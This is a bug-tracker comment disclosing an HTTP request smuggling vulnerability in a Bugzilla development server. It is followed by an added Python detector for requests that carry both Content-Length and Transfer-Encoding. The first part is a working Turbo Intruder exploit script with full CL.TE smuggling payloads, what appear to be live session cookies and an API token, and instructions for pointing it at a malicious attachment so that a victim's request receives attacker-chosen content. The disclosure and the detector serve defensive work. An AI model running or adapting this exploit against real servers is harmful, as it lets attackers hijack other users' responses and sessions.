Bug 1554177 Comment 1 Edit History
Here's a script I successfully used to demonstrate causing an arbitrary response:
```python
import time

# Turbo Intruder script: RequestEngine and table are injected by the extension.


def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint='https://bugzilla-dev.allizom.org:443',
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0
                           )
    engine.start()

    # Chunked request whose terminating 0-chunk is followed by a second,
    # smuggled request (blank lines separate each header block from its body)
    attack = '''POST /home HTTP/1.1
Fooz: bar
Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9; VERSION-Firefox=1.5.0.x%20Branch
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 767
Foo: bar

0

POST /attachment.cgi?id=9155360&t=zUM7YAZi5WW38hKjoYI8D8 HTTP/1.1
Host: bug1395564.bmoattachments.bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bugzilla-dev.allizom.org/show_bug.cgi?id=1395564
X-Forwarded-Host: cow.com
X-Requested-With: XMLHttpRequest
X-Forwarded-For: 81.139.39.150
X-Forwarded-Port: 443
X-Forwarded-Proto: https
Connection: close
Cookie: Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9; VERSION-Firefox=1.5.0.x%20Branch
Content-Type: application/x-www-form-urlencoded
Content-Length: 740

Bugzilla_api_token=hkvtOvKDAeEDu5txHfUPBo&text=foobar'''

    # Ordinary-looking request that will receive the smuggled request's response
    victim = '''POST /home HTTP/1.1
Fooz: bar
Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9; VERSION-Firefox=1.5.0.x%20Branch
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Foo: bar

0

'''

    # The request engine will auto-fix the content-length for us
    # (the leftover template lines "attack = target.req + prefix" and
    # "victim = target.req" referenced an undefined name and overrode the
    # requests above, so they are not used here)
    engine.queue(attack)
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)


def handleResponse(req, interesting):
    table.add(req)
```
You should see that one victim POST request to `bugzilla-dev.allizom.org` gets the contents of the attachment. To make this PoC work for you, you'll need to create a bug, create a malicious attachment, and update the URL and Host header in the smuggled request to contain your attachment ID, bug ID, and attachment token. Please note that the attachment token is either single use or expires very quickly.
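The PoC above depends on a request that carries both Content-Length and Transfer-Encoding, with a second request hidden after the terminating chunk. Below is an added example, not part of the original comment or of Bugzilla's own code, of the framing check a front-end proxy or WAF can apply to reject such requests before they reach a back-end; the two sample requests are constructed for the example and the chunk walker is a minimal reader of RFC 7230 chunked bodies.

```python
# Constructed sample requests (not captured traffic): one shaped like the PoC
# (CL and TE together, a 0-chunk, then a second request) and an ordinary POST.
SMUGGLED = ("POST /home HTTP/1.1\r\nHost: bugzilla-dev.allizom.org\r\n"
            "Transfer-Encoding: chunked\r\nContent-Length: 60\r\n\r\n"
            "0\r\n\r\nPOST /attachment.cgi HTTP/1.1\r\nHost: example.invalid\r\n\r\n")
NORMAL = ("POST /home HTTP/1.1\r\nHost: bugzilla-dev.allizom.org\r\n"
          "Content-Length: 11\r\n\r\ntext=foobar")

def after_last_chunk(body):
    """Walk a chunked body; return the bytes after the terminating 0-chunk and
    its trailers, or None if the body is not well-formed chunked data."""
    pos = 0
    while True:
        end = body.find("\r\n", pos)
        if end < 0:
            return None
        try:  # chunk-size is hex; ignore any ";name=value" chunk extension
            size = int(body[pos:end].split(";", 1)[0].strip(), 16)
        except ValueError:
            return None
        pos = end + 2
        if size == 0:  # terminator: optional trailer lines, then an empty line
            end = body.find("\r\n\r\n", pos - 2)
            return None if end < 0 else body[end + 4:]
        pos += size
        if not body.startswith("\r\n", pos):  # chunk-data must end in CRLF
            return None
        pos += 2

def smuggling_findings(raw):
    """Reasons a front-end should reject this request; an empty list means clean."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = []
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))  # tolerates "TE : chunked"
    te = [v.lower() for n, v in headers if n == "transfer-encoding"]
    cl = [v for n, v in headers if n == "content-length"]
    findings = []
    # RFC 7230 s3.3.3: both framing headers on one request is the CL.TE/TE.CL
    # desync vector used in the PoC; rejecting it removes the ambiguity outright.
    if te and cl:
        findings.append("both Transfer-Encoding and Content-Length present")
    if te:
        rest = after_last_chunk(body)
        if rest:  # a whole second request after the 0-chunk, as in the PoC
            findings.append("%d bytes after terminating chunk" % len(rest))
    return findings
```

A front-end that enforces these findings (or normalises every request to a single Content-Length before forwarding) cannot be made to hand one client's response to another in the way the PoC demonstrates.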